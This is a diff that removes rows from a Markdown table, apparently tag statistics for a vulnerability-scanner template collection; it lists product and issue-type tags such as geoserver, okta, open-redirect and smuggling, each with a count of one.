-| sceditor             |     1 |                                |       |                  |       |          |       |         |       |
-| geoserver            |     1 |                                |       |                  |       |          |       |         |       |
-| directions           |     1 |                                |       |                  |       |          |       |         |       |
-| szhe                 |     1 |                                |       |                  |       |          |       |         |       |
-| phoronix             |     1 |                                |       |                  |       |          |       |         |       |
-| vscode               |     1 |                                |       |                  |       |          |       |         |       |
-| maccmsv10            |     1 |                                |       |                  |       |          |       |         |       |
-| lanproxy             |     1 |                                |       |                  |       |          |       |         |       |
-| testrail             |     1 |                                |       |                  |       |          |       |         |       |
-| supervisor           |     1 |                                |       |                  |       |          |       |         |       |
-| dbeaver              |     1 |                                |       |                  |       |          |       |         |       |
-| ocs-inventory        |     1 |                                |       |                  |       |          |       |         |       |
-| chevereto            |     1 |                                |       |                  |       |          |       |         |       |
-| cerebro              |     1 |                                |       |                  |       |          |       |         |       |
-| ucs                  |     1 |                                |       |                  |       |          |       |         |       |
-| crm                  |     1 |                                |       |                  |       |          |       |         |       |
-| erp-nc               |     1 |                                |       |                  |       |          |       |         |       |
-| drone                |     1 |                                |       |                  |       |          |       |         |       |
-| uwsgi                |     1 |                                |       |                  |       |          |       |         |       |
-| nette                |     1 |                                |       |                  |       |          |       |         |       |
-| mdb                  |     1 |                                |       |                  |       |          |       |         |       |
-| blockchain           |     1 |                                |       |                  |       |          |       |         |       |
-| logontracer          |     1 |                                |       |                  |       |          |       |         |       |
-| etcd                 |     1 |                                |       |                  |       |          |       |         |       |
-| jabber               |     1 |                                |       |                  |       |          |       |         |       |
-| karel                |     1 |                                |       |                  |       |          |       |         |       |
-| camunda              |     1 |                                |       |                  |       |          |       |         |       |
-| zuul                 |     1 |                                |       |                  |       |          |       |         |       |
-| etherscan            |     1 |                                |       |                  |       |          |       |         |       |
-| avatier              |     1 |                                |       |                  |       |          |       |         |       |
-| visionhub            |     1 |                                |       |                  |       |          |       |         |       |
-| xdcms                |     1 |                                |       |                  |       |          |       |         |       |
-| rmi                  |     1 |                                |       |                  |       |          |       |         |       |
-| coinapi              |     1 |                                |       |                  |       |          |       |         |       |
-| piwigo               |     1 |                                |       |                  |       |          |       |         |       |
-| bible                |     1 |                                |       |                  |       |          |       |         |       |
-| suprema              |     1 |                                |       |                  |       |          |       |         |       |
-| tika                 |     1 |                                |       |                  |       |          |       |         |       |
-| visualtools          |     1 |                                |       |                  |       |          |       |         |       |
-| servicedesk          |     1 |                                |       |                  |       |          |       |         |       |
-| zenphoto             |     1 |                                |       |                  |       |          |       |         |       |
-| xproxy               |     1 |                                |       |                  |       |          |       |         |       |
-| jupyterhub           |     1 |                                |       |                  |       |          |       |         |       |
-| episerver            |     1 |                                |       |                  |       |          |       |         |       |
-| streetview           |     1 |                                |       |                  |       |          |       |         |       |
-| mrtg                 |     1 |                                |       |                  |       |          |       |         |       |
-| jaspersoft           |     1 |                                |       |                  |       |          |       |         |       |
-| fortressaircraft     |     1 |                                |       |                  |       |          |       |         |       |
-| bitcoinaverage       |     1 |                                |       |                  |       |          |       |         |       |
-| placeos              |     1 |                                |       |                  |       |          |       |         |       |
-| svn                  |     1 |                                |       |                  |       |          |       |         |       |
-| wiki                 |     1 |                                |       |                  |       |          |       |         |       |
-| fastapi              |     1 |                                |       |                  |       |          |       |         |       |
-| pihole               |     1 |                                |       |                  |       |          |       |         |       |
-| owa                  |     1 |                                |       |                  |       |          |       |         |       |
-| instagram            |     1 |                                |       |                  |       |          |       |         |       |
-| gateone              |     1 |                                |       |                  |       |          |       |         |       |
-| expn                 |     1 |                                |       |                  |       |          |       |         |       |
-| opm                  |     1 |                                |       |                  |       |          |       |         |       |
-| eprints              |     1 |                                |       |                  |       |          |       |         |       |
-| yachtcontrol         |     1 |                                |       |                  |       |          |       |         |       |
-| adiscon              |     1 |                                |       |                  |       |          |       |         |       |
-| karma                |     1 |                                |       |                  |       |          |       |         |       |
-| mirasys              |     1 |                                |       |                  |       |          |       |         |       |
-| yongyou              |     1 |                                |       |                  |       |          |       |         |       |
-| route                |     1 |                                |       |                  |       |          |       |         |       |
-| virustotal           |     1 |                                |       |                  |       |          |       |         |       |
-| axxonsoft            |     1 |                                |       |                  |       |          |       |         |       |
-| securepoint          |     1 |                                |       |                  |       |          |       |         |       |
-| hiawatha             |     1 |                                |       |                  |       |          |       |         |       |
-| domino               |     1 |                                |       |                  |       |          |       |         |       |
-| idemia               |     1 |                                |       |                  |       |          |       |         |       |
-| shadoweb             |     1 |                                |       |                  |       |          |       |         |       |
-| restler              |     1 |                                |       |                  |       |          |       |         |       |
-| alerta               |     1 |                                |       |                  |       |          |       |         |       |
-| interlib             |     1 |                                |       |                  |       |          |       |         |       |
-| aims                 |     1 |                                |       |                  |       |          |       |         |       |
-| shoretel             |     1 |                                |       |                  |       |          |       |         |       |
-| emlog                |     1 |                                |       |                  |       |          |       |         |       |
-| cassandra            |     1 |                                |       |                  |       |          |       |         |       |
-| librenms             |     1 |                                |       |                  |       |          |       |         |       |
-| richfaces            |     1 |                                |       |                  |       |          |       |         |       |
-| timeclock            |     1 |                                |       |                  |       |          |       |         |       |
-| mara                 |     1 |                                |       |                  |       |          |       |         |       |
-| dvdFab               |     1 |                                |       |                  |       |          |       |         |       |
-| synapse              |     1 |                                |       |                  |       |          |       |         |       |
-| abuseipdb            |     1 |                                |       |                  |       |          |       |         |       |
-| cve2021wordpress     |     1 |                                |       |                  |       |          |       |         |       |
-| burp                 |     1 |                                |       |                  |       |          |       |         |       |
-| urlscan              |     1 |                                |       |                  |       |          |       |         |       |
-| faust                |     1 |                                |       |                  |       |          |       |         |       |
-| discourse            |     1 |                                |       |                  |       |          |       |         |       |
-| clearbit             |     1 |                                |       |                  |       |          |       |         |       |
-| anchorcms            |     1 |                                |       |                  |       |          |       |         |       |
-| eyoumail             |     1 |                                |       |                  |       |          |       |         |       |
-| nedi                 |     1 |                                |       |                  |       |          |       |         |       |
-| osquery              |     1 |                                |       |                  |       |          |       |         |       |
-| ninjaform            |     1 |                                |       |                  |       |          |       |         |       |
-| cloudera             |     1 |                                |       |                  |       |          |       |         |       |
-| deviantart           |     1 |                                |       |                  |       |          |       |         |       |
-| petfinder            |     1 |                                |       |                  |       |          |       |         |       |
-| rijksmuseum          |     1 |                                |       |                  |       |          |       |         |       |
-| xoops                |     1 |                                |       |                  |       |          |       |         |       |
-| tugboat              |     1 |                                |       |                  |       |          |       |         |       |
-| graylog              |     1 |                                |       |                  |       |          |       |         |       |
-| secnet-ac            |     1 |                                |       |                  |       |          |       |         |       |
-| redcap               |     1 |                                |       |                  |       |          |       |         |       |
-| spf                  |     1 |                                |       |                  |       |          |       |         |       |
-| majordomo2           |     1 |                                |       |                  |       |          |       |         |       |
-| accuweather          |     1 |                                |       |                  |       |          |       |         |       |
-| ecshop               |     1 |                                |       |                  |       |          |       |         |       |
-| tufin                |     1 |                                |       |                  |       |          |       |         |       |
-| rsyncd               |     1 |                                |       |                  |       |          |       |         |       |
-| opencast             |     1 |                                |       |                  |       |          |       |         |       |
-| thedogapi            |     1 |                                |       |                  |       |          |       |         |       |
-| locations            |     1 |                                |       |                  |       |          |       |         |       |
-| version              |     1 |                                |       |                  |       |          |       |         |       |
-| cliniccases          |     1 |                                |       |                  |       |          |       |         |       |
-| natemail             |     1 |                                |       |                  |       |          |       |         |       |
-| 74cms                |     1 |                                |       |                  |       |          |       |         |       |
-| emc                  |     1 |                                |       |                  |       |          |       |         |       |
-| webex                |     1 |                                |       |                  |       |          |       |         |       |
-| fcm                  |     1 |                                |       |                  |       |          |       |         |       |
-| ganglia              |     1 |                                |       |                  |       |          |       |         |       |
-| geolocation          |     1 |                                |       |                  |       |          |       |         |       |
-| openx                |     1 |                                |       |                  |       |          |       |         |       |
-| achecker             |     1 |                                |       |                  |       |          |       |         |       |
-| foss                 |     1 |                                |       |                  |       |          |       |         |       |
-| zend                 |     1 |                                |       |                  |       |          |       |         |       |
-| primetek             |     1 |                                |       |                  |       |          |       |         |       |
-| accent               |     1 |                                |       |                  |       |          |       |         |       |
-| kronos               |     1 |                                |       |                  |       |          |       |         |       |
-| ruoyi                |     1 |                                |       |                  |       |          |       |         |       |
-| myvuehelp            |     1 |                                |       |                  |       |          |       |         |       |
-| launchdarkly         |     1 |                                |       |                  |       |          |       |         |       |
-| rainloop             |     1 |                                |       |                  |       |          |       |         |       |
-| twig                 |     1 |                                |       |                  |       |          |       |         |       |
-| saml                 |     1 |                                |       |                  |       |          |       |         |       |
-| ns                   |     1 |                                |       |                  |       |          |       |         |       |
-| pagerduty            |     1 |                                |       |                  |       |          |       |         |       |
-| sls                  |     1 |                                |       |                  |       |          |       |         |       |
-| parentlink           |     1 |                                |       |                  |       |          |       |         |       |
-| leostream            |     1 |                                |       |                  |       |          |       |         |       |
-| ucp                  |     1 |                                |       |                  |       |          |       |         |       |
-| lacie                |     1 |                                |       |                  |       |          |       |         |       |
-| netrc                |     1 |                                |       |                  |       |          |       |         |       |
-| pyramid              |     1 |                                |       |                  |       |          |       |         |       |
-| fedora               |     1 |                                |       |                  |       |          |       |         |       |
-| wildfly              |     1 |                                |       |                  |       |          |       |         |       |
-| gocron               |     1 |                                |       |                  |       |          |       |         |       |
-| spinnaker            |     1 |                                |       |                  |       |          |       |         |       |
-| daybyday             |     1 |                                |       |                  |       |          |       |         |       |
-| mailboxvalidator     |     1 |                                |       |                  |       |          |       |         |       |
-| fms                  |     1 |                                |       |                  |       |          |       |         |       |
-| ntopng               |     1 |                                |       |                  |       |          |       |         |       |
-| shopizer             |     1 |                                |       |                  |       |          |       |         |       |
-| open-redirect        |     1 |                                |       |                  |       |          |       |         |       |
-| k8                   |     1 |                                |       |                  |       |          |       |         |       |
-| cors                 |     1 |                                |       |                  |       |          |       |         |       |
-| jnoj                 |     1 |                                |       |                  |       |          |       |         |       |
-| contactform          |     1 |                                |       |                  |       |          |       |         |       |
-| crestron             |     1 |                                |       |                  |       |          |       |         |       |
-| zenario              |     1 |                                |       |                  |       |          |       |         |       |
-| opengear             |     1 |                                |       |                  |       |          |       |         |       |
-| AlphaWeb             |     1 |                                |       |                  |       |          |       |         |       |
-| processwire          |     1 |                                |       |                  |       |          |       |         |       |
-| springframework      |     1 |                                |       |                  |       |          |       |         |       |
-| cx                   |     1 |                                |       |                  |       |          |       |         |       |
-| webftp               |     1 |                                |       |                  |       |          |       |         |       |
-| ewebs                |     1 |                                |       |                  |       |          |       |         |       |
-| landrayoa            |     1 |                                |       |                  |       |          |       |         |       |
-| whmcs                |     1 |                                |       |                  |       |          |       |         |       |
-| racksnet             |     1 |                                |       |                  |       |          |       |         |       |
-| kodi                 |     1 |                                |       |                  |       |          |       |         |       |
-| hetzner              |     1 |                                |       |                  |       |          |       |         |       |
-| zipkin               |     1 |                                |       |                  |       |          |       |         |       |
-| phalcon              |     1 |                                |       |                  |       |          |       |         |       |
-| scanii               |     1 |                                |       |                  |       |          |       |         |       |
-| piluscart            |     1 |                                |       |                  |       |          |       |         |       |
-| cve2002              |     1 |                                |       |                  |       |          |       |         |       |
-| dnn                  |     1 |                                |       |                  |       |          |       |         |       |
-| graphiql             |     1 |                                |       |                  |       |          |       |         |       |
-| office365            |     1 |                                |       |                  |       |          |       |         |       |
-| email                |     1 |                                |       |                  |       |          |       |         |       |
-| commvault            |     1 |                                |       |                  |       |          |       |         |       |
-| wdja                 |     1 |                                |       |                  |       |          |       |         |       |
-| hdnetwork            |     1 |                                |       |                  |       |          |       |         |       |
-| groupoffice          |     1 |                                |       |                  |       |          |       |         |       |
-| gsm                  |     1 |                                |       |                  |       |          |       |         |       |
-| finereport           |     1 |                                |       |                  |       |          |       |         |       |
-| msmtp                |     1 |                                |       |                  |       |          |       |         |       |
-| privx                |     1 |                                |       |                  |       |          |       |         |       |
-| zmanda               |     1 |                                |       |                  |       |          |       |         |       |
-| getgrav              |     1 |                                |       |                  |       |          |       |         |       |
-| gunicorn             |     1 |                                |       |                  |       |          |       |         |       |
-| sucuri               |     1 |                                |       |                  |       |          |       |         |       |
-| floc                 |     1 |                                |       |                  |       |          |       |         |       |
-| vsphere              |     1 |                                |       |                  |       |          |       |         |       |
-| redhat               |     1 |                                |       |                  |       |          |       |         |       |
-| learnpress           |     1 |                                |       |                  |       |          |       |         |       |
-| phabricator          |     1 |                                |       |                  |       |          |       |         |       |
-| jwt                  |     1 |                                |       |                  |       |          |       |         |       |
-| klog                 |     1 |                                |       |                  |       |          |       |         |       |
-| caseaware            |     1 |                                |       |                  |       |          |       |         |       |
-| guppy                |     1 |                                |       |                  |       |          |       |         |       |
-| myucms               |     1 |                                |       |                  |       |          |       |         |       |
-| turbocrm             |     1 |                                |       |                  |       |          |       |         |       |
-| cherokee             |     1 |                                |       |                  |       |          |       |         |       |
-| tinypng              |     1 |                                |       |                  |       |          |       |         |       |
-| securenvoy           |     1 |                                |       |                  |       |          |       |         |       |
-| alltube              |     1 |                                |       |                  |       |          |       |         |       |
-| csod                 |     1 |                                |       |                  |       |          |       |         |       |
-| dotclear             |     1 |                                |       |                  |       |          |       |         |       |
-| dss                  |     1 |                                |       |                  |       |          |       |         |       |
-| viewlinc             |     1 |                                |       |                  |       |          |       |         |       |
-| socomec              |     1 |                                |       |                  |       |          |       |         |       |
-| wondercms            |     1 |                                |       |                  |       |          |       |         |       |
-| casemanager          |     1 |                                |       |                  |       |          |       |         |       |
-| glowroot             |     1 |                                |       |                  |       |          |       |         |       |
-| ricoh                |     1 |                                |       |                  |       |          |       |         |       |
-| allied               |     1 |                                |       |                  |       |          |       |         |       |
-| twitter-server       |     1 |                                |       |                  |       |          |       |         |       |
-| adminset             |     1 |                                |       |                  |       |          |       |         |       |
-| wakatime             |     1 |                                |       |                  |       |          |       |         |       |
-| jreport              |     1 |                                |       |                  |       |          |       |         |       |
-| lenovo               |     1 |                                |       |                  |       |          |       |         |       |
-| iterable             |     1 |                                |       |                  |       |          |       |         |       |
-| quip                 |     1 |                                |       |                  |       |          |       |         |       |
-| teradici             |     1 |                                |       |                  |       |          |       |         |       |
-| sourcecodester       |     1 |                                |       |                  |       |          |       |         |       |
-| jenkin               |     1 |                                |       |                  |       |          |       |         |       |
-| postgres             |     1 |                                |       |                  |       |          |       |         |       |
-| remkon               |     1 |                                |       |                  |       |          |       |         |       |
-| cgit                 |     1 |                                |       |                  |       |          |       |         |       |
-| shiro                |     1 |                                |       |                  |       |          |       |         |       |
-| hue                  |     1 |                                |       |                  |       |          |       |         |       |
-| opensns              |     1 |                                |       |                  |       |          |       |         |       |
-| etherpad             |     1 |                                |       |                  |       |          |       |         |       |
-| razor                |     1 |                                |       |                  |       |          |       |         |       |
-| viaware              |     1 |                                |       |                  |       |          |       |         |       |
-| phpfastcache         |     1 |                                |       |                  |       |          |       |         |       |
-| raspberrymatic       |     1 |                                |       |                  |       |          |       |         |       |
-| powercreator         |     1 |                                |       |                  |       |          |       |         |       |
-| buildbot             |     1 |                                |       |                  |       |          |       |         |       |
-| ddownload            |     1 |                                |       |                  |       |          |       |         |       |
-| argocd               |     1 |                                |       |                  |       |          |       |         |       |
-| xunchi               |     1 |                                |       |                  |       |          |       |         |       |
-| calendarix           |     1 |                                |       |                  |       |          |       |         |       |
-| jspxcms              |     1 |                                |       |                  |       |          |       |         |       |
-| h5s                  |     1 |                                |       |                  |       |          |       |         |       |
-| pulsesecure          |     1 |                                |       |                  |       |          |       |         |       |
-| eyou                 |     1 |                                |       |                  |       |          |       |         |       |
-| qualcomm             |     1 |                                |       |                  |       |          |       |         |       |
-| lumis                |     1 |                                |       |                  |       |          |       |         |       |
-| limit                |     1 |                                |       |                  |       |          |       |         |       |
-| phpfusion            |     1 |                                |       |                  |       |          |       |         |       |
-| smuggling            |     1 |                                |       |                  |       |          |       |         |       |
-| bitquery             |     1 |                                |       |                  |       |          |       |         |       |
-| eibiz                |     1 |                                |       |                  |       |          |       |         |       |
-| timesheet            |     1 |                                |       |                  |       |          |       |         |       |
-| adb                  |     1 |                                |       |                  |       |          |       |         |       |
-| mapbox               |     1 |                                |       |                  |       |          |       |         |       |
-| nexusdb              |     1 |                                |       |                  |       |          |       |         |       |
-| directadmin          |     1 |                                |       |                  |       |          |       |         |       |
-| huemagic             |     1 |                                |       |                  |       |          |       |         |       |
-| asanhamayesh         |     1 |                                |       |                  |       |          |       |         |       |
-| prismaweb            |     1 |                                |       |                  |       |          |       |         |       |
-| gilacms              |     1 |                                |       |                  |       |          |       |         |       |
-| meraki               |     1 |                                |       |                  |       |          |       |         |       |
-| optimizely           |     1 |                                |       |                  |       |          |       |         |       |
-| gofile               |     1 |                                |       |                  |       |          |       |         |       |
-| eyoucms              |     1 |                                |       |                  |       |          |       |         |       |
-| salesforce           |     1 |                                |       |                  |       |          |       |         |       |
-| biostar2             |     1 |                                |       |                  |       |          |       |         |       |
-| mariadb              |     1 |                                |       |                  |       |          |       |         |       |
-| ilo4                 |     1 |                                |       |                  |       |          |       |         |       |
-| mantis               |     1 |                                |       |                  |       |          |       |         |       |
-| zcms                 |     1 |                                |       |                  |       |          |       |         |       |
-| hanming              |     1 |                                |       |                  |       |          |       |         |       |
-| timezone             |     1 |                                |       |                  |       |          |       |         |       |
-| coinranking          |     1 |                                |       |                  |       |          |       |         |       |
-| kubeflow             |     1 |                                |       |                  |       |          |       |         |       |
-| web-suite            |     1 |                                |       |                  |       |          |       |         |       |
-| simplecrm            |     1 |                                |       |                  |       |          |       |         |       |
-| vercel               |     1 |                                |       |                  |       |          |       |         |       |
-| gemweb               |     1 |                                |       |                  |       |          |       |         |       |
-| yarn                 |     1 |                                |       |                  |       |          |       |         |       |
-| planon               |     1 |                                |       |                  |       |          |       |         |       |
-| opencart             |     1 |                                |       |                  |       |          |       |         |       |
-| trilithic            |     1 |                                |       |                  |       |          |       |         |       |
-| okta                 |     1 |                                |       |                  |       |          |       |         |       |
-| acme                 |     1 |                                |       |                  |       |          |       |         |       |
-| loytec               |     1 |                                |       |                  |       |          |       |         |       |
-| honeypot             |     1 |                                |       |                  |       |          |       |         |       |
-| plc                  |     1 |                                |       |                  |       |          |       |         |       |
-| nifi                 |     1 |                                |       |                  |       |          |       |         |       |
-| kyan                 |     1 |                                |       |                  |       |          |       |         |       |
-| nutanix              |     1 |                                |       |                  |       |          |       |         |       |
-| chinaunicom          |     1 |                                |       |                  |       |          |       |         |       |
-| mongoshake           |     1 |                                |       |                  |       |          |       |         |       |
-| fanwei               |     1 |                                |       |                  |       |          |       |         |       |
-| telecom              |     1 |                                |       |                  |       |          |       |         |       |
-| rujjie               |     1 |                                |       |                  |       |          |       |         |       |
-| kodexplorer          |     1 |                                |       |                  |       |          |       |         |       |
-| thinkserver          |     1 |                                |       |                  |       |          |       |         |       |
-| istat                |     1 |                                |       |                  |       |          |       |         |       |
-| veeam                |     1 |                                |       |                  |       |          |       |         |       |
-| clave                |     1 |                                |       |                  |       |          |       |         |       |
-| gsoap                |     1 |                                |       |                  |       |          |       |         |       |
-| lfw                  |     1 |                                |       |                  |       |          |       |         |       |
-| lutron               |     1 |                                |       |                  |       |          |       |         |       |
-| place                |     1 |                                |       |                  |       |          |       |         |       |
-| landray              |     1 |                                |       |                  |       |          |       |         |       |
-| csrfguard            |     1 |                                |       |                  |       |          |       |         |       |
-| easyappointments     |     1 |                                |       |                  |       |          |       |         |       |
-| zarafa               |     1 |                                |       |                  |       |          |       |         |       |
-| tectuus              |     1 |                                |       |                  |       |          |       |         |       |
-| wallix               |     1 |                                |       |                  |       |          |       |         |       |
-| satellian            |     1 |                                |       |                  |       |          |       |         |       |
-| mofi                 |     1 |                                |       |                  |       |          |       |         |       |
-| pinata               |     1 |                                |       |                  |       |          |       |         |       |
-| cve2001              |     1 |                                |       |                  |       |          |       |         |       |
-| hortonworks          |     1 |                                |       |                  |       |          |       |         |       |
-| sterling             |     1 |                                |       |                  |       |          |       |         |       |
-| txt                  |     1 |                                |       |                  |       |          |       |         |       |
-| h5sconsole           |     1 |                                |       |                  |       |          |       |         |       |
-| etouch               |     1 |                                |       |                  |       |          |       |         |       |
-| qsan                 |     1 |                                |       |                  |       |          |       |         |       |
-| zeppelin             |     1 |                                |       |                  |       |          |       |         |       |
-| ssi                  |     1 |                                |       |                  |       |          |       |         |       |
-| ulterius             |     1 |                                |       |                  |       |          |       |         |       |
-| pippoint             |     1 |                                |       |                  |       |          |       |         |       |
-| phpwiki              |     1 |                                |       |                  |       |          |       |         |       |
-| goanywhere           |     1 |                                |       |                  |       |          |       |         |       |
-| stridercd            |     1 |                                |       |                  |       |          |       |         |       |
-| pmb                  |     1 |                                |       |                  |       |          |       |         |       |
-| express              |     1 |                                |       |                  |       |          |       |         |       |
-| couchcms             |     1 |                                |       |                  |       |          |       |         |       |
-| sassy                |     1 |                                |       |                  |       |          |       |         |       |
-| qizhi                |     1 |                                |       |                  |       |          |       |         |       |
-| contentkeeper        |     1 |                                |       |                  |       |          |       |         |       |
-| yaws                 |     1 |                                |       |                  |       |          |       |         |       |
-| memory-pipes         |     1 |                                |       |                  |       |          |       |         |       |
-| intellect            |     1 |                                |       |                  |       |          |       |         |       |
-| netgenie             |     1 |                                |       |                  |       |          |       |         |       |
-| gridx                |     1 |                                |       |                  |       |          |       |         |       |
-| pollbot              |     1 |                                |       |                  |       |          |       |         |       |
-| acontent             |     1 |                                |       |                  |       |          |       |         |       |
-| basic-auth           |     1 |                                |       |                  |       |          |       |         |       |
-| apiman               |     1 |                                |       |                  |       |          |       |         |       |
-| epm                  |     1 |                                |       |                  |       |          |       |         |       |
-| tink                 |     1 |                                |       |                  |       |          |       |         |       |
-| visualstudio         |     1 |                                |       |                  |       |          |       |         |       |
-| phpunit              |     1 |                                |       |                  |       |          |       |         |       |
-| spip                 |     1 |                                |       |                  |       |          |       |         |       |
-| nps                  |     1 |                                |       |                  |       |          |       |         |       |
-| hiboss               |     1 |                                |       |                  |       |          |       |         |       |
-| dropbox              |     1 |                                |       |                  |       |          |       |         |       |
-| myanimelist          |     1 |                                |       |                  |       |          |       |         |       |
-| synnefo              |     1 |                                |       |                  |       |          |       |         |       |
-| sar2html             |     1 |                                |       |                  |       |          |       |         |       |
-| esxi                 |     1 |                                |       |                  |       |          |       |         |       |
-| xiuno                |     1 |                                |       |                  |       |          |       |         |       |
-| workresources        |     1 |                                |       |                  |       |          |       |         |       |
-| stem                 |     1 |                                |       |                  |       |          |       |         |       |
-| faraday              |     1 |                                |       |                  |       |          |       |         |       |
-| addpac               |     1 |                                |       |                  |       |          |       |         |       |
-| oidc                 |     1 |                                |       |                  |       |          |       |         |       |
-| shopxo               |     1 |                                |       |                  |       |          |       |         |       |
-| ncomputing           |     1 |                                |       |                  |       |          |       |         |       |
-| icinga               |     1 |                                |       |                  |       |          |       |         |       |
-| apple                |     1 |                                |       |                  |       |          |       |         |       |
-| keenetic             |     1 |                                |       |                  |       |          |       |         |       |
-| darkstat             |     1 |                                |       |                  |       |          |       |         |       |
-| zentral              |     1 |                                |       |                  |       |          |       |         |       |
-| sonarcloud           |     1 |                                |       |                  |       |          |       |         |       |
-| omi                  |     1 |                                |       |                  |       |          |       |         |       |
-| blueiris             |     1 |                                |       |                  |       |          |       |         |       |
-| fastly               |     1 |                                |       |                  |       |          |       |         |       |
-| saltapi              |     1 |                                |       |                  |       |          |       |         |       |
-| dompdf               |     1 |                                |       |                  |       |          |       |         |       |
-| postmark             |     1 |                                |       |                  |       |          |       |         |       |
-| newrelic             |     1 |                                |       |                  |       |          |       |         |       |
-| snipeit              |     1 |                                |       |                  |       |          |       |         |       |
-| flexbe               |     1 |                                |       |                  |       |          |       |         |       |
-| eyesofnetwork        |     1 |                                |       |                  |       |          |       |         |       |
-| mdm                  |     1 |                                |       |                  |       |          |       |         |       |
-| slocum               |     1 |                                |       |                  |       |          |       |         |       |
-| delta                |     1 |                                |       |                  |       |          |       |         |       |
-| tor                  |     1 |                                |       |                  |       |          |       |         |       |
-| thinkadmin           |     1 |                                |       |                  |       |          |       |         |       |
-| box                  |     1 |                                |       |                  |       |          |       |         |       |
-| strava               |     1 |                                |       |                  |       |          |       |         |       |
-| details              |     1 |                                |       |                  |       |          |       |         |       |
-| formalms             |     1 |                                |       |                  |       |          |       |         |       |
-| wmt                  |     1 |                                |       |                  |       |          |       |         |       |
-| xmlchart             |     1 |                                |       |                  |       |          |       |         |       |
-| opensearch           |     1 |                                |       |                  |       |          |       |         |       |
-| trello               |     1 |                                |       |                  |       |          |       |         |       |
-| mx                   |     1 |                                |       |                  |       |          |       |         |       |
-| h3c                  |     1 |                                |       |                  |       |          |       |         |       |
-| iconfinder           |     1 |                                |       |                  |       |          |       |         |       |
-| cname                |     1 |                                |       |                  |       |          |       |         |       |
-| sofneta              |     1 |                                |       |                  |       |          |       |         |       |
-| starttls             |     1 |                                |       |                  |       |          |       |         |       |
-| asus                 |     1 |                                |       |                  |       |          |       |         |       |
-| franklinfueling      |     1 |                                |       |                  |       |          |       |         |       |
-| exponentcms          |     1 |                                |       |                  |       |          |       |         |       |
-| nweb2fax             |     1 |                                |       |                  |       |          |       |         |       |
-| superwebmailer       |     1 |                                |       |                  |       |          |       |         |       |
-| alertmanager         |     1 |                                |       |                  |       |          |       |         |       |
-| wowza                |     1 |                                |       |                  |       |          |       |         |       |
-| revslider            |     1 |                                |       |                  |       |          |       |         |       |
-| sage                 |     1 |                                |       |                  |       |          |       |         |       |
-| tamronos             |     1 |                                |       |                  |       |          |       |         |       |
-| lotuscms             |     1 |                                |       |                  |       |          |       |         |       |
-| siteomat             |     1 |                                |       |                  |       |          |       |         |       |
-| issabel              |     1 |                                |       |                  |       |          |       |         |       |
-| tuxedo               |     1 |                                |       |                  |       |          |       |         |       |
-| solarlog             |     1 |                                |       |                  |       |          |       |         |       |
-| smartsense           |     1 |                                |       |                  |       |          |       |         |       |
-| zoneminder           |     1 |                                |       |                  |       |          |       |         |       |
-| b2bbuilder           |     1 |                                |       |                  |       |          |       |         |       |
-| ssltls               |     1 |                                |       |                  |       |          |       |         |       |
-| dahua                |     1 |                                |       |                  |       |          |       |         |       |
-| pods                 |     1 |                                |       |                  |       |          |       |         |       |
-| concourse            |     1 |                                |       |                  |       |          |       |         |       |
-| smartsheet           |     1 |                                |       |                  |       |          |       |         |       |
-| workspace            |     1 |                                |       |                  |       |          |       |         |       |
-| softaculous          |     1 |                                |       |                  |       |          |       |         |       |
-| biqsdrive            |     1 |                                |       |                  |       |          |       |         |       |
-| particle             |     1 |                                |       |                  |       |          |       |         |       |
-| argussurveillance    |     1 |                                |       |                  |       |          |       |         |       |
-| checkmarx            |     1 |                                |       |                  |       |          |       |         |       |
-| holidayapi           |     1 |                                |       |                  |       |          |       |         |       |
-| fleet                |     1 |                                |       |                  |       |          |       |         |       |
-| cve2004              |     1 |                                |       |                  |       |          |       |         |       |
-| knowage              |     1 |                                |       |                  |       |          |       |         |       |
-| sunflower            |     1 |                                |       |                  |       |          |       |         |       |
-| clockwatch           |     1 |                                |       |                  |       |          |       |         |       |
-| arl                  |     1 |                                |       |                  |       |          |       |         |       |
-| speed                |     1 |                                |       |                  |       |          |       |         |       |
-| ignition             |     1 |                                |       |                  |       |          |       |         |       |
-| feedwordpress        |     1 |                                |       |                  |       |          |       |         |       |
-| appweb               |     1 |                                |       |                  |       |          |       |         |       |
-| incapptic-connect    |     1 |                                |       |                  |       |          |       |         |       |
-| shopware             |     1 |                                |       |                  |       |          |       |         |       |
-| aerohive             |     1 |                                |       |                  |       |          |       |         |       |
-| doh                  |     1 |                                |       |                  |       |          |       |         |       |
-| commscope            |     1 |                                |       |                  |       |          |       |         |       |
-| apcu                 |     1 |                                |       |                  |       |          |       |         |       |
-| fhem                 |     1 |                                |       |                  |       |          |       |         |       |
-| ecsimagingpacs       |     1 |                                |       |                  |       |          |       |         |       |
-| nimble               |     1 |                                |       |                  |       |          |       |         |       |
-| nomad                |     1 |                                |       |                  |       |          |       |         |       |
-| edgeos               |     1 |                                |       |                  |       |          |       |         |       |
-| malshare             |     1 |                                |       |                  |       |          |       |         |       |
-| oauth2               |     1 |                                |       |                  |       |          |       |         |       |
-| qdpm                 |     1 |                                |       |                  |       |          |       |         |       |
-| mediumish            |     1 |                                |       |                  |       |          |       |         |       |
-| flask                |     1 |                                |       |                  |       |          |       |         |       |
-| siemens              |     1 |                                |       |                  |       |          |       |         |       |
-| unisharp             |     1 |                                |       |                  |       |          |       |         |       |
-| dicoogle             |     1 |                                |       |                  |       |          |       |         |       |
-| kvm                  |     1 |                                |       |                  |       |          |       |         |       |
-| ncbi                 |     1 |                                |       |                  |       |          |       |         |       |
-| nc2                  |     1 |                                |       |                  |       |          |       |         |       |
-| adafruit             |     1 |                                |       |                  |       |          |       |         |       |
-| ebird                |     1 |                                |       |                  |       |          |       |         |       |
-| purestorage          |     1 |                                |       |                  |       |          |       |         |       |
-| bookstack            |     1 |                                |       |                  |       |          |       |         |       |
-| idera                |     1 |                                |       |                  |       |          |       |         |       |
-| wing-ftp             |     1 |                                |       |                  |       |          |       |         |       |
-| eyelock              |     1 |                                |       |                  |       |          |       |         |       |
-| ldap                 |     1 |                                |       |                  |       |          |       |         |       |
-| struts2              |     1 |                                |       |                  |       |          |       |         |       |
-| tarantella           |     1 |                                |       |                  |       |          |       |         |       |
-| fiori                |     1 |                                |       |                  |       |          |       |         |       |
-| luftguitar           |     1 |                                |       |                  |       |          |       |         |       |
-| optiLink             |     1 |                                |       |                  |       |          |       |         |       |
-| sast                 |     1 |                                |       |                  |       |          |       |         |       |
-| htmli                |     1 |                                |       |                  |       |          |       |         |       |
-| dvr                  |     1 |                                |       |                  |       |          |       |         |       |
-| bazarr               |     1 |                                |       |                  |       |          |       |         |       |
-| sitefinity           |     1 |                                |       |                  |       |          |       |         |       |
-| formcraft3           |     1 |                                |       |                  |       |          |       |         |       |
